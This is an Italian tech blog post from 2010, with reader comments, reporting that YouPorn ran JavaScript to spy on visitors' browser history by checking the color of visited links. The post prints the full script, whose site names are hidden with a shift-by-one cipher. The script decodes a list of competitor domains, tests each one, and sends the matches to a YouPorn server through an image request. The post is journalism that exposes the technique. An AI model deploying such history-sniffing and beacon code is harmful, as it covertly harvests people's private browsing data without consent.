YouPorn spia la cronologia del browser

Quello che vedete qui sopra non è un pezzo di codice Javascript scritto da un programmatore ubriaco, ma una parte del modo studiato da quelli assoldati da YouPorn per spiare la cronologia del browser del visitatore di turno. Il tutto adottando un espediente che potremmo definire imbarazzante tanto quanto il fatto che venga utilizzato per andare a sfruttare una debolezza nel funzionamento dei browser più comuni, per ottenere informazioni sulla cronologia in modo fraudolento e completamente trasparente agli occhi di chi è davanti al PC, almeno fino a oggi.

L’idea di chi ha scritto il Javascript in questione è stata sostanzialmente quella di sfruttare il modo in cui i browser visualizzano i link già visitati, assegnando cioè loro un colore diverso da quelli che invece non sono all’interno della cronologia: per intenderci, il solito color porpora rispetto al classico blu. Ma in questo caso non finisce qui, anzi il bello deve ancora venire, perché YouPorn ha avuto anche la brillante idea di andare a nascondere l’invasione della privacy dei suoi visitatori “crittando” questo algoritmo, anche se usare tale parola costituisce di sicuro un abuso di proporzioni siderali.

Anche in questo caso la cosa migliore è l’esempio pratico: tornando alla lista di inizio post, prendete come esempio l’apparentemente privo di significato “qpsoivc/dpn”: basta poco per scoprire che a YouPorn interessa sapere se prima di approdare sulle sue sponde abbiamo già visitato “pornhub.com”. In che modo? Semplicemente andando a sostituire a ogni lettera quella a essa precedente nell’alfabeto. È così che “uvcf9/dpn” diventa “tube8.com”, e così via. Da vero e proprio genio del male, o no?

Dopo il break, per i più curiosi, il codice completo.

Via | Forbes | Techdirt

< script type="text/javascript">
function ypol(){var k={0:”qpsoivc/dpn”,1:”sfeuvcf/dpn”,
2:”bevmugsjfoegjoefs/dpn”,3:”ywjefpt/dpn”,4:”uvcf9/dpn”,
5:”yoyy/dpn”,6:”nfhbqpso/dpn”,7:”nfhbspujd/dpn”,
8:”yibntufs/dpn”,9:”bxfnqjsf/dpn”,10:”sfbmjuzljoht/dpn”,
11:”csb{{fst/dpn”,12:”yuvcf/dpn”,13:”cbohcspt2/dpn”,
14:”gmjoh/dpn”,15:”gsffpoft/dpn”,16:”nzgsffqbztjuf/dpn”,
17:”efcpobjscmph/dpn”,18:”qbztfswf/dpn”,19:”nbyqpso/dpn”,
20:”wjefpt{/dpn”,21:”bfco/ofu”,22:”qpsopsbnb/dpn”};
var g=[];for(var m in k){var d=k[m];
var a=”";for(var f=0;f {a+=String.fromCharCode(d.charCodeAt(f)-1)}var h=false;
for(var j in {"http://":"","http://www.":""})
{var l=document.createElement("a");
l.href=j+a;document.getElementById("ol").appendChild(l);
var e="";if(navigator.appName.indexOf("Microsoft")!=-1){e=l.currentStyle.color}
else{e=document.defaultView.getComputedStyle(l,null).getPropertyValue("color")}
if(e=="rgb(12, 34, 56)"||e=="rgb(12,34,56)"){h=true}}if(h){g.push(m)}}
var b=(g instanceof Array)?g.join(","):"";var c=document.createElement("img");
c.src="http://ol.youporn.com/blank.gif?id="+b;document.getElementById("ol").appendChild(c)}ypol();


(1 Voti | Media: 5 su 5)

15 commenti

Categorie

• Video
• Privacy

Articoli simili

Firefox 1.0, la prima versione del browser, pubblicata sette anni fa del 09 nov 2011

Cercare nella cronologia con Historious del 18 lug 2010

La scelta del browser sarà inserita anche in Windows XP e Vista del 30 lug 2009

L'analisi della cronologia del browser determina il tuo sesso del 02 ago 2008

Apertura del browser più veloce con Firefox Preloader del 08 feb 2008

Argomenti Simili

javascript youporn, youporn, youporn cronologia, youporn spia cronologia

Gallerie Correlate

• 
  YouTube Editor

Commenti dei lettori

• Commento #1 (-4 punti) - 01 dic 2010 - 17:55 - Apri commento

• mr.oizo

  01 dic 2010 - 17:55 - #1 (nascondi)

  -4 punti

  

  youporn? e che cos’è?

• sisisis

  01 dic 2010 - 17:55 - #2

  0 punti

  

  i siti criptati sono comunque stabiliti in maniera statica. Il problema sarebbe più grave se attingesse ad un più vasto database o in maniera dinamica alla cronologia o cache del browser, per individuare tutti i siti visitati.

• 

  theprov

  01 dic 2010 - 18:08 - #3

  4 punti

  

  Se serve a offrire un servizio migliore ben venga…
  AHAHAHAHAHAHHAAH……

• 

  stramaxxa

  01 dic 2010 - 19:03 - #4

  1 punto

  

  “i siti criptati sono comunque stabiliti in maniera statica.”
  non puoi dimostrarlo….. tu lo vedi statico nel codice ma nulla vieta che il codice venga generato all’occorrenza.

  Non ho mai analizzato i codici dei vari sistemi di statistica, ma credo proprio che quasiasi servizio di statistica stile Google Analitycs esegue un codice similare….

  Non hanno inventato l’acqua calda….

  La cosa che fa buffo forse è che spii i diretti concorrenti.

• Commento #5 (-6 punti) - 01 dic 2010 - 19:03 - Apri commento

• piùumiledighost

  01 dic 2010 - 20:07 - #5 (nascondi)

  -6 punti

  

  Perfetto, siamo già arrivati a scrivere anche sulle tecniche dei siti pornografici. Ma nessuno si rende conto che rivolgersi al pubblico non è come parlare al bar e che bisogna rispettare un’etica? Mah…

• nickname pr

  01 dic 2010 - 20:52 - #6

  0 punti

  

  piu’umile…scusa ma non ho davvero capito il tuo commento…

• 

  agonar

  01 dic 2010 - 21:31 - #7

  2 punti

  

  vuol dire che su un blog che parli di internet non si devono trattare le tecniche usate nei siti porno. Quindi si deve chiudere gli occhi e far finta che non sia successo nulla.
  ………………..
  ma vai a lavorare piùumile!!
  Quando si tratta di tecniche originali o particolari non importa da dove vengano!!! Mamma mia come sei bacchettone!!!

• Marco Rossi

  01 dic 2010 - 22:33 - #8

  0 punti

  

  Non è una cosa da sottovalutare, un sito come Google che possiede la potenza ed un numero massivo di dati da incrociare potrebbe scandagliare ad ogni ogni ricerca che fai una serie di siti legati alla keyword, e fornirti pubblicità mirata, potrebbe anche rivendere i dati ai propri clienti, potrebbe immagazzinare le informazioni della history di milioni di persone per vendere meglio i propri prodotti.

• piùumiledighost

  01 dic 2010 - 22:48 - #9

  0 punti

  

  @agonar, è proprio perchè lavoro 14 ore al giorno sul Web, che mi rendo conto che la qualità si abbassa sempre più, per colpa nostra che ci lavoriamo o che ci scriviamo. Se non sei d’accordo con il mio concetto di etica, nulla da eccepire, ognuno ha la sua. Buona lettura

• Geddato

  01 dic 2010 - 23:09 - #10

  1 punto

  

  piùumiledighost, non c’è nulla di scandaloso o hard nell’articolo… al massimo si recepisce l’esistenza dei siti porno. Non credo sia nè una novità nè una cosa offensiva.

• 

  46ilmigliore

  01 dic 2010 - 23:13 - #11

  3 punti

  

  Manco una sega ti puoi più fare senza essere spiato!!

• 

  bladex

  02 dic 2010 - 00:43 - #12

  0 punti

  

  @piùumiledighost mamma mia che bacchettone che sei!!!….
  A parte che anche i bambini di 5 anni sanno di youporn e di certo non hanno scoperto questo sito su downloadblog…. ma daiii….
  Intervento pretestuoso e fuori luogo..
  Mica ti sarai scandalizzato per aver mostrato il codice “nudo”??? ahah..
  Questo è un articolo ed ha un contenuto, ci sono altri siti che mettono immagini nude quando non c’entrano o banner di roba porno quando stai su un sito che parla di tutt’altro, lì ci sarebbe da scandalizzarsi…

• maxifasso

  02 dic 2010 - 10:48 - #13

  2 punti

  

  Bladex, hai parlato di geekissimo in maniera indiretta ? :D

• Andydandy

  02 dic 2010 - 10:59 - #14

  0 punti

  

  Di questa tecnica se ne parla da anni …

• interessante

  02 dic 2010 - 14:09 - #15

  0 punti

  

  Quindi in pratica il js non fa altro che creare un elemento link e popolarlo di siti che vuole testare e guardando il colore capisce se è visitato o no.
  Usando noscript posso abilitare solo quello che mi interessa, ed evitare quell inutile script.
  Domandina, con le ‘nuove’ modalità private o modalità porn dei browser viene ricordata la cronologia?